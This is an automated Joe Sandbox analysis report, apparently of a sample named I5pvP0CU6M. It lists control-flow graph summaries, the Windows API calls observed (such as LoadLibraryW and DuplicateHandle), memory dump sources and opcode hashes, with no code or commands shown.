                                                          • Source File: 00000000.00000002.2219047219.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2b80000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: d90cff33478e0544eba0a03de30f5d18dbe56c2ccc4f8b4eee9d80cf7c137564
                                                          • Instruction ID: bc4e450469e3753eb649c55d014f618f80aaebc2086d7dde1bb7be592fa87c7e
                                                          • Opcode Fuzzy Hash: d90cff33478e0544eba0a03de30f5d18dbe56c2ccc4f8b4eee9d80cf7c137564
                                                          • Instruction Fuzzy Hash: 9241CEB1D11349DFDB14CFAAC884ADEBBB5FF48310F24816AE918AB210D771A845CF90

                                                          Control-flow Graph

                                                          control_flow_graph 716 10c58ec-10c59b9 CreateActCtxA 718 10c59bb-10c59c1 716->718 719 10c59c2-10c5a1c 716->719 718->719 726 10c5a1e-10c5a21 719->726 727 10c5a2b-10c5a2f 719->727 726->727 728 10c5a40 727->728 729 10c5a31-10c5a3d 727->729 731 10c5a41 728->731 729->728 731->731
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 010C59A9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2215038486.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: cad56c82e98ee0791f723c659fe02adcdba22e6a5e9466c2c418e422fb2375e1
                                                          • Instruction ID: f3fcf3b72d7b87e83b296683b0ef9d39e254fa5f417d40ed54c3241b6acbb3f6
                                                          • Opcode Fuzzy Hash: cad56c82e98ee0791f723c659fe02adcdba22e6a5e9466c2c418e422fb2375e1
                                                          • Instruction Fuzzy Hash: AF41E270D00719CBEB24CFAAC9847DEBBF5BF88704F20809AD448AB251DB716946CF50

                                                          Control-flow Graph

                                                          control_flow_graph 732 10c44d4-10c59b9 CreateActCtxA 735 10c59bb-10c59c1 732->735 736 10c59c2-10c5a1c 732->736 735->736 743 10c5a1e-10c5a21 736->743 744 10c5a2b-10c5a2f 736->744 743->744 745 10c5a40 744->745 746 10c5a31-10c5a3d 744->746 748 10c5a41 745->748 746->745 748->748
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 010C59A9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2215038486.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: 5e303391c4902066e2edbaa586f2a7a37ef70668113ece8d55905b42df465c80
                                                          • Instruction ID: 0d0f577ac997407e06822021bad9bda2f9c9823ae17f88a43ec9f826e2d0dfd3
                                                          • Opcode Fuzzy Hash: 5e303391c4902066e2edbaa586f2a7a37ef70668113ece8d55905b42df465c80
                                                          • Instruction Fuzzy Hash: B641F370D0071DCBEB24CFAAC98479EBBF5BF48704F2080AAD409AB251DB716945CF90

                                                          Control-flow Graph

                                                          control_flow_graph 749 2b840a0-2b840dc 750 2b8418c-2b841ac 749->750 751 2b840e2-2b840e7 749->751 757 2b841af-2b841bc 750->757 752 2b840e9-2b84120 751->752 753 2b8413a-2b84172 CallWindowProcW 751->753 759 2b84129-2b84138 752->759 760 2b84122-2b84128 752->760 755 2b8417b-2b8418a 753->755 756 2b84174-2b8417a 753->756 755->757 756->755 759->757 760->759
                                                          APIs
                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 02B84161
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2219047219.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2b80000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: CallProcWindow
                                                          • String ID:
                                                          • API String ID: 2714655100-0
                                                          • Opcode ID: 2f3a2552f9b24d332dd22b192d503a7686106a5a56087382ae747fc67e34345c
                                                          • Instruction ID: 3d53b73eb146f8c2a235ffbd868b9139d3716d076af0cddaa49753d7ec9a44a9
                                                          • Opcode Fuzzy Hash: 2f3a2552f9b24d332dd22b192d503a7686106a5a56087382ae747fc67e34345c
                                                          • Instruction Fuzzy Hash: 3341FCB5A0030ACFDB14DF99C484AAAFBF5FF98314F248499D51967321D774A841CFA0

                                                          Control-flow Graph

                                                          control_flow_graph 763 10cd4d8-10cd4de 764 10cd4e0-10cd574 DuplicateHandle 763->764 765 10cd57d-10cd59a 764->765 766 10cd576-10cd57c 764->766 766->765
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010CD567
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2215038486.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: fa93a509cfe294a513d900b4a0f896ffde055822eed6fe441fe317135a6b73f0
                                                          • Instruction ID: 43f4faf7bd2e6d3e95c80cf4f03a8e5153a327d56eac2248dbd2a8ec1464d214
                                                          • Opcode Fuzzy Hash: fa93a509cfe294a513d900b4a0f896ffde055822eed6fe441fe317135a6b73f0
                                                          • Instruction Fuzzy Hash: 8B21F4B5900249DFDB10CFAAD984ADEBBF4EB48714F10801AE954A3310D374A945CFA1

                                                          Control-flow Graph

                                                          control_flow_graph 769 10cd4e0-10cd574 DuplicateHandle 770 10cd57d-10cd59a 769->770 771 10cd576-10cd57c 769->771 771->770
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010CD567
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2215038486.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 741b3aa120613137f19138b965c117379b8e89233bf0819f04da39e6457d602a
                                                          • Instruction ID: 2dc34a1ab19a04dcf3f8402fb9bc172dd41802431eb052c94c35124dd53d923c
                                                          • Opcode Fuzzy Hash: 741b3aa120613137f19138b965c117379b8e89233bf0819f04da39e6457d602a
                                                          • Instruction Fuzzy Hash: 6D21E3B5900249DFDB10CFAAD984ADEBFF4EB48720F14841AE954A3310D374A950CFA1

                                                          Control-flow Graph

                                                          control_flow_graph 774 10cb0d8-10cb118 775 10cb11a-10cb11d 774->775 776 10cb120-10cb14b GetModuleHandleW 774->776 775->776 777 10cb14d-10cb153 776->777 778 10cb154-10cb168 776->778 777->778
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 010CB13E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2215038486.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: d6e4655c86a10de065bdd041f99444792c3e6453e3f57cea52083caa01482592
                                                          • Instruction ID: 68ce301ca0bbec3293ce273ebcc6b80b0890c1b54a8cba25fd22f40c0dc8d861
                                                          • Opcode Fuzzy Hash: d6e4655c86a10de065bdd041f99444792c3e6453e3f57cea52083caa01482592
                                                          • Instruction Fuzzy Hash: 591102B5C002498FDB10CF9AC444A9EFBF4AB88624F10845AD958A7200D375A545CFA1
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b6c0e5081a47afc61ef5776651cbf54f9c2ec876df8174d0c5a74f5f9c8fa341
                                                          • Instruction ID: 0ded20246b2a5c9131a2c6c3bd2cac320025a28cbb26d2f886b6fa7ddcafd487
                                                          • Opcode Fuzzy Hash: b6c0e5081a47afc61ef5776651cbf54f9c2ec876df8174d0c5a74f5f9c8fa341
                                                          • Instruction Fuzzy Hash: 0A012B7140C340DAE7144E25CD84B67BF98DF4A334F18D51BFE0A6F692CA79A840C671
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2212393354.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ead000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fd73dcfcc0012d7f4c4fafc9ff5ae225fcc9979463a5b09c1ab04c411cdc0311
                                                          • Instruction ID: a5c5f3ac10f15c2cc44746460d8fd06d84afe27d3bf487c373737992f5a89174
                                                          • Opcode Fuzzy Hash: fd73dcfcc0012d7f4c4fafc9ff5ae225fcc9979463a5b09c1ab04c411cdc0311
                                                          • Instruction Fuzzy Hash: 73F0C2714083449AE7148E15CC84B62FF98EB85738F18C05BFD091F696C679A844CBB1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0e5489fa83c03f70d7eefe3f210d99c6f7eb7b925fcf2a5cdff3a8c97c342f4d
                                                          • Instruction ID: 70822d5e32dcc21ec99e6bf49c13fb7b49dde99db2d669e3de95ab68075a6ccc
                                                          • Opcode Fuzzy Hash: 0e5489fa83c03f70d7eefe3f210d99c6f7eb7b925fcf2a5cdff3a8c97c342f4d
                                                          • Instruction Fuzzy Hash: 2E322970E00219CFDB58DFA9D8557AEBBF2AF88300F148569D409EB285EB349D45CFA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2219047219.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2b80000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1c27fa23e5ad0e96cb03c2899441db991df66f1652692f848c0ed4b86192eeae
                                                          • Instruction ID: 07536fd2e3895c3750b053851dd071adfa6084ed2c3b7d9433c99e5ef8da66d5
                                                          • Opcode Fuzzy Hash: 1c27fa23e5ad0e96cb03c2899441db991df66f1652692f848c0ed4b86192eeae
                                                          • Instruction Fuzzy Hash: A11273B1801746CAEB38CF65E94C2897BB9FB85328F904709D2616F2E9DBB4154BCF44
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1618d65158fcaa1973c8ffd49583f1d1fc653f254656ffeba589d76abd74aa6e
                                                          • Instruction ID: a84a8e194b8dc8c5a156f55d7ddf61fb96c2a3dfbb4f8e534da4af07b99afc91
                                                          • Opcode Fuzzy Hash: 1618d65158fcaa1973c8ffd49583f1d1fc653f254656ffeba589d76abd74aa6e
                                                          • Instruction Fuzzy Hash: 16E10A74E002598FDB14DFA9C580AAEFBF2BF89304F248259D855AB356D770AD42CF60
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3aa9c98841d0777c807a64f6c859bbb8dddd53b6660dd31e9c169ea6085eda2b
                                                          • Instruction ID: 1570d42162765777304e1591ef0993f5f9bf926097a7e61de7ad0757babe520f
                                                          • Opcode Fuzzy Hash: 3aa9c98841d0777c807a64f6c859bbb8dddd53b6660dd31e9c169ea6085eda2b
                                                          • Instruction Fuzzy Hash: 65C11A71E00258DFDB14DF65D884B9EFBF2BF88310F1481AAD809AB255EB709985CF60
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2215038486.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0eb1e28c153f9a0e92d33f2c1d8246eadc6804c2338614760bc762b145eacd7d
                                                          • Instruction ID: 64547f20e60d9d4261650ed41d36bd7c682cce552f717b68238c4d209d3f734a
                                                          • Opcode Fuzzy Hash: 0eb1e28c153f9a0e92d33f2c1d8246eadc6804c2338614760bc762b145eacd7d
                                                          • Instruction Fuzzy Hash: 42A16E32A0020A8FCF15DFB4C8845DEBBB2FF85700B1581AEE905AB265DB71E955CF80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2219047219.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2b80000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bf0100382e504781e006df0b9b05f10d49991b4f41592dcb9d11549c1d8dfff0
                                                          • Instruction ID: b43f00873c331c0453ad475666d6144ebe44a1adf0a9fb496fb70c36d6fe3678
                                                          • Opcode Fuzzy Hash: bf0100382e504781e006df0b9b05f10d49991b4f41592dcb9d11549c1d8dfff0
                                                          • Instruction Fuzzy Hash: 08C1D4B1801746CAEB38CF69E94C2897BB9FB85324F614709D2616F2E9DBB4144BCF44
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fa799183d63bc595a6a105b01a0943d82143f4fae4bc58bf7b2c29262a184bcf
                                                          • Instruction ID: 6d0168bf650d6368e1c3680f1866c9407c1ab896d72c6f5ed84e0d46a9a498a2
                                                          • Opcode Fuzzy Hash: fa799183d63bc595a6a105b01a0943d82143f4fae4bc58bf7b2c29262a184bcf
                                                          • Instruction Fuzzy Hash: AA718175E046188FDB08DFAAC584A9EFBF2BF88310F28D566D819EB215D7349942CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19b3b168ede202dc44191c3a1de72ce83848ffc645fe4718c90c9bb482713e39
                                                          • Instruction ID: 61879a3f3cd52c4aa8909c9259b8b9b3d6822172f0a206a6bd2091283ccd0a88
                                                          • Opcode Fuzzy Hash: 19b3b168ede202dc44191c3a1de72ce83848ffc645fe4718c90c9bb482713e39
                                                          • Instruction Fuzzy Hash: AC51F774E002598BDB14DFA9C9806AEFBF2BF89304F248169D858AB216D7719D42CF61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f0fd7c032f770d8b8d6849a3ca50131c5eacdd9681232969dcf245bafcb08d4d
                                                          • Instruction ID: bc638fc6a4fd8661ffe292df63458f4cc33401203c6e1f0c8e7297b53a47ab91
                                                          • Opcode Fuzzy Hash: f0fd7c032f770d8b8d6849a3ca50131c5eacdd9681232969dcf245bafcb08d4d
                                                          • Instruction Fuzzy Hash: 17516275E006188FDB08DFAAD98469EFBF2BF88310F14C16AD819EB214DB345946CF50

Execution Graph

Execution Coverage: 15.1%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 25
Total number of Limit Nodes: 1
[Execution graph figure; labelled API call nodes: LoadLibraryW, GetConsoleWindow]




                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2345112018.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_62c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: la$a
                                                          • API String ID: 0-644286645
                                                          • Opcode ID: 0371d8cb6e903a80edad945168ddeccba67ebbaec68546bd52fa8a11ab06bb75
                                                          • Instruction ID: 9073b817b34e0d9d16450add020583f30259c79ad91c622d2d888686efb084b0
                                                          • Opcode Fuzzy Hash: 0371d8cb6e903a80edad945168ddeccba67ebbaec68546bd52fa8a11ab06bb75
                                                          • Instruction Fuzzy Hash: BED1B130B10245CFDB41CFA4C854A6A7BB6FF85714F14825AEA019F3A6CBB2DC05CB92
                                                          APIs
                                                          • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,062774A6), ref: 06277656
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2344988192.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_6270000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 704cd10594e092463370bd2a1f45cf375bc31f6be1167624a4fbe2d34d497c65
                                                          • Instruction ID: ce958fe2d08992100605487640b7844f4a732234e76c29770a83dd7a98af6eca
                                                          • Opcode Fuzzy Hash: 704cd10594e092463370bd2a1f45cf375bc31f6be1167624a4fbe2d34d497c65
                                                          • Instruction Fuzzy Hash: E211F6B6C0064A8FDB10DF9AC844ADEFBF4EF88724F14842AD519A7610D375A546CFA1
                                                          APIs
                                                          • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,062774A6), ref: 06277656
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2344988192.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_6270000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 8d162618ed8f378748e23a403330fbd3bb33402825364803448ca4438e6956dc
                                                          • Instruction ID: 0a051b37ef7b00896e65ecfcfbe08c23f507348ca01d71ff09145157574f184b
                                                          • Opcode Fuzzy Hash: 8d162618ed8f378748e23a403330fbd3bb33402825364803448ca4438e6956dc
                                                          • Instruction Fuzzy Hash: D81112B5D0074A8FDB10CF9AC844A9EFBF4AB88220F14842AD919B7210D3B9A545CFA5
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2324663295.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_ea0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWindow
                                                          • String ID:
                                                          • API String ID: 2863861424-0
                                                          • Opcode ID: b867d44bfc3ce99c1400a6f3546647f6936ed4506e26a74253e2107013296179
                                                          • Instruction ID: 885a8e9a2a09544b15cfc6e87b0ca25439f3f63c5544176a23c554436b91204d
                                                          • Opcode Fuzzy Hash: b867d44bfc3ce99c1400a6f3546647f6936ed4506e26a74253e2107013296179
                                                          • Instruction Fuzzy Hash: 561146719043498FDB20CFAAC4457EEFBF0AF88324F24841AC519B7240C7796504CB91
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2324663295.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_ea0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWindow
                                                          • String ID:
                                                          • API String ID: 2863861424-0
                                                          • Opcode ID: ef236668c24f572c0c4cbb37ffaa3c461abca4cbe77a919b2fe419c38dc49dbd
                                                          • Instruction ID: bb383dab8cc257c0a618c72956fe59e5baa13b248023404229865a17eb567946
                                                          • Opcode Fuzzy Hash: ef236668c24f572c0c4cbb37ffaa3c461abca4cbe77a919b2fe419c38dc49dbd
                                                          • Instruction Fuzzy Hash: DD1103759003498FDB20DFAAC44579FFBF4AF88724F24881AD519A7240CB79A944CBA5
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2345112018.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_62c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eadef1adc461fef3036a712cf3915dce1855b96668362004ec78cd07b3bc75b0
                                                          • Instruction ID: 2dbb0bc691e6ad378f00469d7d810f4ed3bf0d6a46a3db8c74dd516e1cdd0e9c
                                                          • Opcode Fuzzy Hash: eadef1adc461fef3036a712cf3915dce1855b96668362004ec78cd07b3bc75b0
                                                          • Instruction Fuzzy Hash: 65A1B074B102059FDB45DB78C854A6EBBF2EF89310B2489AEE915DB3A2CB70DC05CB51
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2345112018.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_62c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d499bac5280c43798be0689b9075993cd83bff64b78fe8ae4a2bc94a3f44b6c5
                                                          • Instruction ID: bb79c426b4f00ff41dac2ec8ff3d0cbf640fbd4e597708ad687d5f1beb48ed38
                                                          • Opcode Fuzzy Hash: d499bac5280c43798be0689b9075993cd83bff64b78fe8ae4a2bc94a3f44b6c5
                                                          • Instruction Fuzzy Hash: 8E917E35B102159FCB44CF68C894E9ABBF2FF89710B1584AAEA05EB361DB71EC05CB51
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2345112018.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_62c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 94de672d39c42c126d4ae43bb3d86e20829fd0ecb1e773bfcbb59e773d748c5a
                                                          • Instruction ID: 660312f84b7c15cab9a3fa86063032810763d98cd0bfe5064f59cfcc1835add4
                                                          • Opcode Fuzzy Hash: 94de672d39c42c126d4ae43bb3d86e20829fd0ecb1e773bfcbb59e773d748c5a
                                                          • Instruction Fuzzy Hash: C4515735B203568FD7509A7DD85856ABBE9EFC2220B14827FDD05CB612EB30C851C7A2
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2324064629.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_e4d000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 41892f4eda8fc0d68c2915ec13d45a7ca745c8f6156167541e72aa635d36c837
                                                          • Instruction ID: 61b330b1c7fb871056f7aab8b80eda69bbfa356f6fc8846c4785960d0725e735
                                                          • Opcode Fuzzy Hash: 41892f4eda8fc0d68c2915ec13d45a7ca745c8f6156167541e72aa635d36c837
                                                          • Instruction Fuzzy Hash: 55210872508244EFDB15DF10EDC0B2ABF66FB88318F24C159ED091B256C376D816CB61
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2324187331.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_e5d000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0e53f33098540a0f121a1bd28f59119fa8913ad659a44822fb7f0c28145985dd
                                                          • Instruction ID: d18f817a4eb923f18b2553ec7fd3745d24f622b52641b10266047035063ae152
                                                          • Opcode Fuzzy Hash: 0e53f33098540a0f121a1bd28f59119fa8913ad659a44822fb7f0c28145985dd
                                                          • Instruction Fuzzy Hash: C9214971508304EFCB14DF50C9C0B26BB61FB84319F20C96DDD095B352C776D84ACA62
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2324187331.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_e5d000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6fa84ca604317b0a4d09a666704d6b6cbe8eb5fd8f85049ddd42a1e26340d5d5
                                                          • Instruction ID: 7fd84a37f036f612fb470360fe45398581f453cc457063df55373c8944f2b12a
                                                          • Opcode Fuzzy Hash: 6fa84ca604317b0a4d09a666704d6b6cbe8eb5fd8f85049ddd42a1e26340d5d5
                                                          • Instruction Fuzzy Hash: F1213876508244EFDB24DF14DDC0B2ABB65FB84325F24C96DDC095B252C37AD84ACAA2
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2324064629.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_e4d000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 83fb694dd1e91a6ea135483331fab76a04ef60c4faa8ae053019808facf22284
                                                          • Instruction ID: aafea7dfae61d89f932c611f5b0ff08a931eb77c05539f2674a4996a63e4bc15
                                                          • Opcode Fuzzy Hash: 83fb694dd1e91a6ea135483331fab76a04ef60c4faa8ae053019808facf22284
                                                          • Instruction Fuzzy Hash: 87219D76505284DFCB16CF10E9C4B1ABF72FB88318F2486A9DD491A656C33AD826CB91
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2324187331.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_e5d000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                          • Instruction ID: a27b07eef366bccdb3a2f68d6ee95ff7701ee6e705bbd165974a6b8a630fdbb1
                                                          • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                          • Instruction Fuzzy Hash: DE119075508284DFCB15CF50D9C4B15BB71FB84318F24CAA9DC494B656C33AD84ACB52
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2324187331.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_e5d000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ecf76333c4857edb0cae155a2ed822a1bfe38db2c40391184a4fb299c42cee64
                                                          • Instruction ID: 17f82b39b0a4845516f166bff0168bde3a2dca5e9ea5232a583f205b79332d83
